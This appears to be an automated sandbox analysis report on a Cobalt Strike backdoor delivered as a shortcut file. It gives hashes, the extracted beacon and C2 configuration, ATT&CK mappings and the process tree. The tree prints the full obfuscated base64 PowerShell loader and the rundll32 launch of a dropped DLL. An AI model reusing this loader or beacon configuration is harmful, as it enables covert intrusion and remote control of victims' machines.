cobaltstrike | 300c090861a547a4c211b15b9f45d6dcb976128c21b78b6c38d1cf4c5d998e12

Analysis

max time kernel
93s
max time network
140s
platform
windows10_x64
resource
win10v20201028
submitted
06-03-2021 19:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ds7002.lnk
Size

392KB
MD5

6ed0020b0851fb71d5b0076f4ee95f3c
SHA1

e431261c63f94a174a1308defccc674dabbe3609
SHA256

2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
SHA512

2a0b04791ab102b6d1760c5f0940969318562f444a5864ebf270f568cc8f6283630ca76377a9fc75691b67e7c459ab10782a2deb439fa9981a2f94bb208232f3

Score

10^/10

cobaltstrike backdoor trojan

Malware Config

Extracted

Family

cobaltstrike

http://pandorasong.com:443/access/

Attributes

access_type
512
beacon_type
2048
create_remote_thread
0
day
0
dns_idle
0
dns_sleep
0
host
pandorasong.com,/access/
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAeR2V0Q29udGVudEZlYXR1cmVzLkRMTkEuT1JHOiAxAAAACgAAABVIb3N0OiBwYW5kb3Jhc29uZy5jb20AAAAKAAAASENvb2tpZTogIF9fdXRtYT0zMTAwNjY3MzMuMjg4NDUzNDQ0MC4xNDMzMjAxNDYyLjE0MDMyMDQzNzIuMTM4NTIwMjQ5OC43OwAAAAkAAAAJdmVyc2lvbj00AAAACQAAAA5saWQ9MTU4MjUwMjcyNAAAAAcAAAAAAAAACAAAAAUAAAAFdG9rZW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAKAAAAFUhvc3Q6IHBhbmRvcmFzb25nLmNvbQAAAAcAAAAAAAAABQAAAANyaWQAAAAJAAAADmxpZD0xNjgzNTAzNzM1AAAACQAAAB9tZXRob2Q9Z2V0U2VhcmNoUmVjb21tZW5kYXRpb25zAAAABwAAAAEAAAADAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_method1
GET
http_method2
POST
injection_process
jitter
4352
maxdns
255
month
0
pipe_name
\\%s\pipe\msagent_%x
polling_time
300000
port_number
443
proxy_password
proxy_server
proxy_username
sc_process32
%windir%\syswow64\rundll32.exe
sc_process64
%windir%\sysnative\rundll32.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN7UFLcBHjvme4lLXoOKMyNrF46j4Xi87J4ilrNPDQxLOq2KHaCXP+0FsWYs7JFqLXGmqOIfALpPLIyGgnRuC60ZXaSKmCENE2O88Z0BxDkRxSaKEbgv3ETo/Ra7cF8JNr3szy0sNBVyi9dhS2WhXRIU923X2ZQxbpSyUNi5Q//wIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
7.382016e+08
unknown2
AAAABAAAAAIAAAAQAAAAAgAAABAAAAACAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown3
0
unknown4
0
unknown5
2.350256387e+09
uri
/radio/xmlrpc/v45
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
year
0

Signatures

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

3960 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
3960	rundll32.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

powershell.exeAcroRd32.exe

pid	process
748	powershell.exe
748	powershell.exe
748	powershell.exe
748	powershell.exe
748	powershell.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 748 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

4088 AcroRd32.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

AcroRd32.exe

pid process

4088 AcroRd32.exe
4088 AcroRd32.exe
4088 AcroRd32.exe
4088 AcroRd32.exe
4088 AcroRd32.exe
4088 AcroRd32.exe
4088 AcroRd32.exe

description	pid	process
Token: SeDebugPrivilege	748	powershell.exe

pid	process
4088	AcroRd32.exe

pid	process
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe
4088	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.execsc.execsc.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 1308 wrote to memory of 748	1308	cmd.exe	powershell.exe
PID 1308 wrote to memory of 748	1308	cmd.exe	powershell.exe
PID 748 wrote to memory of 648	748	powershell.exe	csc.exe
PID 748 wrote to memory of 648	748	powershell.exe	csc.exe
PID 648 wrote to memory of 2776	648	csc.exe	cvtres.exe
PID 648 wrote to memory of 2776	648	csc.exe	cvtres.exe
PID 748 wrote to memory of 2464	748	powershell.exe	csc.exe
PID 748 wrote to memory of 2464	748	powershell.exe	csc.exe
PID 2464 wrote to memory of 360	2464	csc.exe	cvtres.exe
PID 2464 wrote to memory of 360	2464	csc.exe	cvtres.exe
PID 748 wrote to memory of 4088	748	powershell.exe	AcroRd32.exe
PID 748 wrote to memory of 4088	748	powershell.exe	AcroRd32.exe
PID 748 wrote to memory of 4088	748	powershell.exe	AcroRd32.exe
PID 748 wrote to memory of 3960	748	powershell.exe	rundll32.exe
PID 748 wrote to memory of 3960	748	powershell.exe	rundll32.exe
PID 4088 wrote to memory of 3944	4088	AcroRd32.exe	RdrCEF.exe
PID 4088 wrote to memory of 3944	4088	AcroRd32.exe	RdrCEF.exe
PID 4088 wrote to memory of 3944	4088	AcroRd32.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 3828	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 1152	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 1152	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 1152	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 1152	3944	RdrCEF.exe	RdrCEF.exe
PID 3944 wrote to memory of 1152	3944	RdrCEF.exe	RdrCEF.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\ds7002.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJEVudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUpO30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2enZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZCgkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFycmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:748

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qm4epklo\qm4epklo.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:648

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8562.tmp" "c:\Users\Admin\AppData\Local\Temp\qm4epklo\CSC7552A301EA074411BC475A8B99736BCE.TMP"
4⤵
PID:2776

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ua5jr1wv\ua5jr1wv.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2464

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES862D.tmp" "c:\Users\Admin\AppData\Local\Temp\ua5jr1wv\CSCA4AB05B7D56441ADA22692FF7976C61F.TMP"
4⤵
PID:360

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ds7002.PDF"
3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4088

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
- Suspicious use of WriteProcessMemory
PID:3944

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C763C67BCC8B05ED84E1D58E20AA2B7C --mojo-platform-channel-handle=1640 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:3828

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=736B1FEE9DB1F07E6D5729D52C467B30 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=736B1FEE9DB1F07E6D5729D52C467B30 --renderer-client-id=2 --mojo-platform-channel-handle=1632 --allow-no-sandbox-job /prefetch:1
5⤵
PID:1152

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A1E0F5243F469E398BCB2122E5F4C2FA --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A1E0F5243F469E398BCB2122E5F4C2FA --renderer-client-id=4 --mojo-platform-channel-handle=2216 --allow-no-sandbox-job /prefetch:1
5⤵
PID:3396

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F09A9D54645AA85A8A683EAC3C4DB114 --mojo-platform-channel-handle=2444 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:4184

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=354CD58114EDC64D4772F53BB259D3AE --mojo-platform-channel-handle=2668 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:4292

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A4FFCE97BC80E07D6639C7AF772B5190 --mojo-platform-channel-handle=2680 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:4384

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\cyzfc.dat, PointFunctionCall
3⤵
- Loads dropped DLL
PID:3960

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES8562.tmp
MD5
54043aeaa27f3192242feef8d0767116

SHA1
965dc59465da37c8df153e30088b5663e577d8bb

SHA256
86ce7b91e871b76095c1fe5aa359bd455f7a072f173342e64cc654d9f7cc4109

SHA512
2a0046d32c0127d2da396e1989c6ee21a1a8dfd469a9f8cc3ffe3c44ca1912183a894e13960aaa67f032e886904b36a5341ae7db05fc54198e290cc57102f84b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES862D.tmp
MD5
7ce711dff3fc3086ce3cb0148d7c52bb

SHA1
cf8202ec95697702ee1d0ae9b09e47846a013847

SHA256
d58878146ca0facecb4d9f8080267e60ad0f69695263b87dde4159f04bcc6386

SHA512
c63987b733b143fcd2a7f73af8707c6d55ed086b4046e57aa648153beff84640c7a12e0bd10b6f86e972c8a18ba5b0cc82fe82c8b048d70219731c4d06eb7e28

Download Submit
C:\Users\Admin\AppData\Local\Temp\ds7002.PDF
MD5
313f4808aa2a2073005d219bc68971cd

SHA1
053fb60530e884851eb8b6aebbec4570ec788d4a

SHA256
b1c811d3f0e930b0096a9e785f730ba4d92458bd6dcfbdff4cf7a1e247ef20d1

SHA512
1d983f3c659eb3dfac3fe280e7cb3c6e25264752c11ff7d2ab232ffbf30b659a3d61bdf3773ec32caa09de716a3c439dea0d77dab5cb9e07d0e6ec43a0b1a68d

Download Submit
C:\Users\Admin\AppData\Local\Temp\qm4epklo\qm4epklo.dll
MD5
4119ebfd7a6abc4e4e11c8565c9a5829

SHA1
0b470f9193ab799c295558bdc5e5e8bc96f30071

SHA256
3e20fb63db39654e5959c5d73591f5991be679608af65acc0b37abdade4442f2

SHA512
4c080f1d211aaf95d760e3dae3b6bf8c158fe998e23c3b087132321155fe5a5f4e98e15f31d0a57fdb64e69dd15453d30bdf924b2caf45977caaa5bd3ffc6046

Download Submit
C:\Users\Admin\AppData\Local\Temp\ua5jr1wv\ua5jr1wv.dll
MD5
8d6b661ca8cfe06c9fb7dd5c89f5f337

SHA1
7206625b569cd52aaa20db542d4f4562d5f10dd6

SHA256
9333166d8cea299a9e564b66d2d49f7ac7e15b5110de7163d811e922fc53090b

SHA512
b62310d1c3b4f0958a923eaca99bb39da245ac9c542fcee1d163e9d3cd6767183a5056f49ab88b729d7c4741ef6c6017ebbcb6ee67d06c1aa387149973bbb453

Download Submit
C:\Users\Admin\AppData\Local\cyzfc.dat
MD5
16bbc967a8b6a365871a05c74a4f345b

SHA1
9858d5cb2a6614be3c48e33911bf9f7978b441bf

SHA256
b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05

SHA512
68c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qm4epklo\CSC7552A301EA074411BC475A8B99736BCE.TMP
MD5
152282baec007a686075a13f9f7e330a

SHA1
aeea85744670a678d03ee92cb5ec3f7f092ef74a

SHA256
c5d5bb126b3ea7b2bb37b03deb62aa4020ba15e3f3d938cb6c888154163a68b4

SHA512
f2c551f29a9c7d741eeeb654c8fa8bd11747f6fff505b5d7a124c602f7ae2fd78dce55648bd8e6cc0591fb39d85c33f5c7d4c9a8cdf8e7bfdafc9bb31f5826ee

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qm4epklo\qm4epklo.0.cs
MD5
